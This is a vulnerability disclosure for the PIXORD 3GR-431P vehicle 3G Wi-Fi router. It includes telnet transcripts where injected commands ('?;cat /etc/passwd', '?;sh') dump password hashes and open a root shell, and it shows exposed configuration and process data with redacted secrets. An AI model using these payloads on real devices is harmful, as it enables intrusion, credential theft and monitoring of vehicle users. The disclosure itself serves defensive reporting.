扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 |
# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple Vulnerabilities] # Date: May 01, 2015 [No response from Vendor till date] # Discovered by: Karn Ganeshen # Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17] # Version: [Model Name :3GR-431P] [Software Version :RTA-A001_02] [Wireless Driver Version :2.6.0.0] *Vehicle 3G Wi-Fi Router - PIXORD * http://www.pixord.com/en/products_show.php?show=17 *Device Info * Model Name :3GR-431P Software Version :RTA-A001_02 Wireless Driver Version :2.6.0.0 PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless router. It supports Internet access via 3G and receives position information from GPS. 3GR-431P also supports two Ethernet ports for LAN connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity. It is available to install the 3GR-431P on the transportation. The passengers can use the laptop or smart phone via Wi-Fi to browse the Internet on the go. The Ethernet port also can connect IP camera to provide the real time monitoring. Vulnerability Impact: Easy and full device compromise. Access to configured keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user / vehicle via camera / connected devices. *Multiple Security Vulnerabilities * *1. OS command injection * $ telnet 192.168.1.10 Trying 192.168.1.10... Connected to 192.168.1.10. Escape character is '^]'. Vehicle 3G Wi-Fi Router Login: admin Password: > > ? mobile3G mobileGPS model reboot restoredefault version As seen above, only few specific, functional options are available for device management. However, we can bypass this and dump hashes easily. > ?;cat /etc/passwd sh: ?: not found admin:<password1>:0:0:Adminstrator:/:/bin/sh support:<password2>:0:0:Adminstrator:/:/bin/sh user:<password3>:0:0:Adminstrator:/:/bin/sh > exit Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs in over the Telnet. The web application lacks strict input validation and hence vulnerable to OS command injection attack. *2. Configuration not secured properly / AuthZ issues * The device has three users - admin, support, user. Apparently, there is no separation of privileges between these 3 users, when accessing over HTTP(S). All options are available to all three then. This allows 'user' /'support' to access device configuration file - RT2880_Settings.dat. Configuration backup contains b64-encoded login passwords + clear-text WPA keys + other sensitive information. .. … *Sensitive information in configuration file - * *more RT2880_Settings.dat * #The following line must not be removed. Default WebInit=1 HostName=pixord Login=admin Password=<admin_password_here>= Login2=support Password2=<support_password_here>== Login3=user Password3=<user_password_here>== OperationMode=1 Platform=RT3352 ..... <snip> ..... wan_pppoe_user=pppoe_user wan_pppoe_pass=pppoe_passwd wan_l2tp_server=l2tp_server wan_l2tp_user=l2tp_user wan_l2tp_pass=l2tp_passwd ..... <snip> ..... wan_pptp_server=pptp_server wan_pptp_user=pptp_user wan_pptp_pass=pptp_passwd ..... <snip> ..... DDNS= DDNSAccount=<ddns_account_name_here> DDNSPassword=<ddns_password_here> CountryRegion= CountryRegionABand= CountryCode= BssidNum=1 SSID1=PiXORD WirelessMode=9 ..... <snip> ..... WscSSID=RalinkInitialAP WscKeyMGMT=WPA-EAP WscConfigMethod=138 WscAuthType=1 WscEncrypType=1 WscNewKey=<wsc_key_here> IEEE8021X=0 IEEE80211H=0 CSPeriod=6 PreAuth=0 AuthMode=WPAPSKWPA2PSK EncrypType=TKIPAES RekeyInterval=3600 RekeyMethod=TIME PMKCachePeriod=10 WPAPSK1=<WPA_PSK_Key_here> DefaultKeyID=2 Key1Type=0 Key1Str1= Key2Type=0 Key2Str1= Key3Type=0 Key3Str1= Key4Type=0 Key4Str1= WapiPskType=0 ..... <snip> ..... WdsEnable=0 WdsEncrypType=NONE WdsList= WdsKey= WirelessEvent=0 RADIUS_Server=0 RADIUS_Port=1812 RADIUS_Key= RADIUS_Acct_Server= RADIUS_Acct_Port=1813 RADIUS_Acct_Key= ..... <snip> ..... wan_3g_apn=public wan_3g_dial=*99# wan_3g_user= wan_3g_pass= <snip> RADIUS_Key1=<radius_key_here> ..... <snip> ..... Also, as observed in point 1 above, all the users have a UID 0, i.e. root level privileges to the device: admin:<password1>:0:0:Adminstrator:/:/bin/sh support:<password2>:0:0:Adminstrator:/:/bin/sh user:<password3>:0:0:Adminstrator:/:/bin/sh The application should ideally provide specific privileges to different users, and enforce strict access control. *3. Application does not secure configured passwords (HTTPS) * Masked password(s) can be retrieved via frame source (inspect element) and / or intercepting request via a proxy. The application should mask/censure (*****) the passwords, keys and any other crucial pieces of configuration and must not pass the values in clear-text. *4. Program / Scripts running in an insecure manner - leaking clear-text passwords in process information * After logging in to the device over Telnet, we can drop in to a shell via OS command injection attack described in point 1. > ?;sh sh: ?: not found Enter 'help' for a list of built-in commands. BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash) # Checking running processes reveal a system program *inadyn*, which apparently is a service for ddns connectivity, leaking valid username and password in clear-text. # ps aux PID USER VSZ STAT COMMAND 1 admin 1768 S init 2 admin 0 RWN [ksoftirqd/0] ..... <snip> ..... 2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>* -a *<ddns_domain_here>* 4050 admin 1768 R ps aux The programs should be run securely without passing cli arguments and parameter values in clear-text. -- Best Regards, Karn Ganeshen |
体验盒子
